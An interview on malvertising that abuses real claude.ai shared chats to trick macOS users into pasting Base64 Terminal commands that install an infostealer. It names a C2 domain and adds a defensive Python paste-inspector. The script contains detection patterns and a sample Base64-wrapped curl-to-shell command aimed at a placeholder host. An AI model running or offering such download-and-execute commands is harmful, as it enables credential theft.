Rupert Marais is a leading in-house security specialist with deep expertise in endpoint protection, device security, and the evolving landscape of macOS threats. With years of experience managing complex network infrastructures and developing cybersecurity strategies, he has become a pivotal voice in identifying how modern attackers exploit the intersection of human trust and legitimate web services. In this discussion, we explore the alarming rise of malvertising campaigns that weaponize official AI platforms to deliver sophisticated infostealers to unsuspecting users.
The conversation covers the mechanics of how attackers use legitimate domains to mask malicious intents and the technical hurdles of detecting polymorphic, memory-resident malware. We also examine the specific methods used to harvest sensitive credentials from macOS systems and the vital steps organizations must take to protect their employees from command-line exploitation.
Search results often display legitimate URLs that lead directly to official AI platforms, yet these specific pages can host malicious instructions. How do attackers exploit the trust associated with verified domains, and what social engineering tactics are most effective in tricking users into executing Terminal commands?
This campaign represents a clever evolution in malvertising because it removes the “red flag” of a fake domain. By using Google Ads that point to the actual claude.ai domain, attackers bypass the skepticism users usually have for suspicious URLs. Once the user is on the legitimate site, the attackers leverage the “shared chat” feature to present a polished, authoritative-looking guide. They even go as far as masquerading as “Apple Support” within the chat to create a false sense of security and urgency. This environment makes it much easier to convince a user to copy and paste a Base64-encoded string into their Terminal, as they believe they are following a verified installation procedure for the “Claude Code” tool.
Modern macOS threats frequently utilize polymorphic delivery and memory-resident scripts to bypass traditional signature-based security tools. What are the technical challenges in detecting these “fileless” attacks, and why do some campaigns include checks for specific keyboard layouts or regional settings before deploying the final payload?
The primary challenge is that these scripts, such as the Gunzip-compressed shell instructions we’ve observed, run entirely in memory without dropping a traditional binary file that an antivirus could scan on the disk. By using polymorphic delivery, the server sends a uniquely obfuscated version of the payload for every single request, which means there is no consistent “file hash” for security tools to flag. The regional checks, specifically looking for Russian or CIS-region keyboard layouts, serve as a defensive filter for the attackers. If these layouts are detected, the script sends a “cis_blocked” status and terminates, likely to avoid drawing the attention of law enforcement in those specific jurisdictions or to ensure they are only hitting high-value Western targets.
When an infostealer successfully compromises a system, it often targets browser cookies and the local Keychain. Could you walk us through the process by which attackers package and exfiltrate this sensitive data, and what are the long-term security implications for users whose encrypted credentials are harvested?
Once the second-stage payload is executed via macOS’s built-in osascript engine, it gains the ability to reach into protected areas of the system. The malware, identified in some cases as the MacSync infostealer, systematically harvests browser credentials, session cookies, and the contents of the macOS Keychain. This data is bundled into a package and exfiltrated to a command-and-control server, such as the briskinternet[.]com domain used in recent attacks. The long-term implications are devastating because even if a user changes their password, stolen session cookies can allow attackers to bypass Multi-Factor Authentication (MFA) and maintain access to accounts until those specific sessions are manually revoked.
Many users rely on search engines to find software installation guides, which increases the risk of encountering weaponized content on legitimate hosting platforms. What standard operating procedures should individuals follow when using command-line interfaces, and how can organizations better educate employees to distinguish between official documentation and malicious shared chats?
Individuals must adopt a “zero-trust” approach to the command line; you should never paste a command into Terminal unless you have manually verified the source and understand exactly what the string is doing, especially if it is encoded in Base64. Organizations need to emphasize that official tools like the Claude Code CLI are hosted in formal documentation or via package managers like Homebrew, not within a chat window. We need to teach employees that legitimate companies will never ask you to run a script provided by an AI chatbot to install their software. It is also critical to encourage users to navigate directly to official websites by typing the URL themselves rather than clicking on “Sponsored” results, which have become a primary vector for these 2-stage delivery attacks.
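The advice above (never paste an encoded string into Terminal without decoding it first) and the earlier point that polymorphic, in-memory delivery leaves no stable file hash both lead to the same defensive check: inspect the structure of a command before it runs, not the hash of a file that never lands on disk. The following Python script is an added example written for this page, not a tool from the interview or from any vendor. It peels nested Base64 layers out of a pasted command and flags the constructs that have no place in a legitimate installation guide (decode-to-shell, download-to-shell, gunzip-to-shell, osascript, eval). The sample commands, including the Base64 blob and the example.invalid URL, are constructed for the demonstration; the indicator list is an assumption about what a defender would want to flag, not a complete signature set.

```python
"""Paste inspector for Terminal commands.

Decodes Base64 layers found in a command string and reports shell-execution
patterns at every layer, so the decision to block or review is made on the
decoded content rather than on a file hash that polymorphic delivery defeats.
Added example; constructed samples only.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field

# Runs of 24 or more Base64 alphabet characters, with optional padding, are
# long enough to be worth decoding. Shorter tokens are ignored to limit noise.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Defender-side indicators (assumed list): constructs that should never appear
# in an "installation command" copied from a chat window or a search result.
# macOS base64 uses -D/--decode and GNU uses -d, so both spellings are matched.
INDICATORS = {
    "base64_to_shell": re.compile(r"base64\s+(-[dD]|--decode)\b.*\|\s*(ba|z)?sh\b"),
    "remote_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"),
    "gunzip_to_shell": re.compile(r"\b(gunzip|gzip\s+-d|zcat)\b.*\|\s*(ba|z)?sh\b"),
    "osascript": re.compile(r"\bosascript\b"),
    "eval": re.compile(r"\beval\b"),
    "hidden_file_or_tmp_exec": re.compile(r"(chmod\s+\+x|/tmp/\.)"),
}


@dataclass
class Assessment:
    verdict: str                                      # "ok", "review" or "block"
    indicators: list = field(default_factory=list)    # (layer depth, indicator name)
    decoded_layers: list = field(default_factory=list)  # decoded text, outermost first


def _looks_like_text(data: bytes) -> bool:
    """Accept a decode only if it is mostly printable, so Base64-looking tokens
    that are really hashes or API keys are not reported as hidden commands."""
    if not data:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in data)
    return printable / len(data) > 0.9


def decode_layers(text: str, max_depth: int = 3) -> list:
    """Return the chain of decoded strings obtained by peeling nested Base64."""
    layers = []
    current = text
    for _ in range(max_depth):
        decoded_any = False
        for match in B64_RUN.finditer(current):
            try:
                raw = base64.b64decode(match.group(0), validate=True)
            except (binascii.Error, ValueError):
                continue  # not valid Base64 (bad padding or length)
            if _looks_like_text(raw):
                current = raw.decode("utf-8", errors="replace")
                layers.append(current)
                decoded_any = True
                break
        if not decoded_any:
            break
    return layers


def assess_command(cmd: str) -> Assessment:
    """Scan the command and every decoded layer; any indicator hit means block."""
    layers = decode_layers(cmd)
    hits = []
    for depth, text in enumerate([cmd] + layers):
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.append((depth, name))
    if hits:
        verdict = "block"
    elif layers:
        verdict = "review"   # hidden text but no known indicator: human look
    else:
        verdict = "ok"
    return Assessment(verdict, hits, layers)


def build_sample_command() -> str:
    """Constructed sample with the shape the interview describes: a Base64 string
    piped to a shell. The inner text points at a reserved .invalid host."""
    inner = "curl -fsSL https://example.invalid/stage2.sh | sh"
    blob = base64.b64encode(inner.encode()).decode()
    return f'echo "{blob}" | base64 -D | sh'


if __name__ == "__main__":
    for sample in (build_sample_command(),
                   "brew install --cask visual-studio-code",
                   "git show 0123456789abcdef0123456789abcdef01234567"):
        result = assess_command(sample)
        print(result.verdict, result.indicators)
```

The hex commit hash in the last sample is a deliberate edge case: it matches the Base64 alphabet and decodes without error, but the decoded bytes are not text, so it is neither reported as a hidden layer nor escalated. The constructed first sample is flagged twice, once at the outer layer (decode piped to a shell) and once in the decoded text (download piped to a shell), which is the signal a signature on the ever-changing blob itself could not give.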
What is your forecast for the evolution of malvertising and the abuse of shared AI features?
I expect we will see a significant increase in the “living off the land” approach where attackers stop building their own phishing sites entirely and instead host 100% of their malicious content on trusted platforms like Anthropic, OpenAI, or GitHub. As AI tools become more integrated into professional workflows, attackers will likely move toward more targeted “spear-malvertising,” where they bid on very specific technical keywords to catch developers and system administrators. We are entering an era where the URL is no longer a reliable indicator of safety, shifting the burden of security away from automated filters and back onto the split-second judgment of the user.
